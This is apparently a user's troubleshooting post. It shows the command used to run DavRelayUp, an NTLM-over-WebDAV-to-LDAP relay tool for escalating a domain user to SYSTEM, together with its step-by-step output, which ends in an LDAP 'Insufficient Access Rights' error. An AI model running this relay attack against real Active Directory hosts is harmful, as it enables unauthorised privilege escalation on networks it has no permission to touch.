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Hello, if I try to start from domain user i've got the error.

DavRelayUp.exe --CreateNewComputerAccount --Port 10443
DavRelayUp - Relaying you to SYSTEM, again...

[+] WebClient Service started successfully
[+] Computer account "DAVRELAYUP$" added with password "gM4#vD2=zX3$jI3$"
[+] Starting Relay Server on Port 10443
[+] Coercing System Authentication
[+] WebDAV Request: No Authorization header
[+] WebDAV Response: Sending 401 Unauthorized with "WWW-Authenticate: NTLM" header
[+] WebDAV Request: Got NTLMSSP_NEGOTIATE. Initiating connection to LDAP
[+] LDAP Bind: Got NTLMSSP_CHALLENGE from LDAP server. Relaying to WebDAV Client
[+] WebDAV Response: Sending 401 Unauthorized with NTLMSSP_CHALLENGE from LDAP
[+] WebDAV Request: Got NTLMSSP_AUTH. Relaying to LDAP
[+] LDAP Bind: Connected to LDAP as domain\user
LDAP Result Code 50 "Insufficient Access Rights": 00002098: SecErr: DSID-03150F93, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0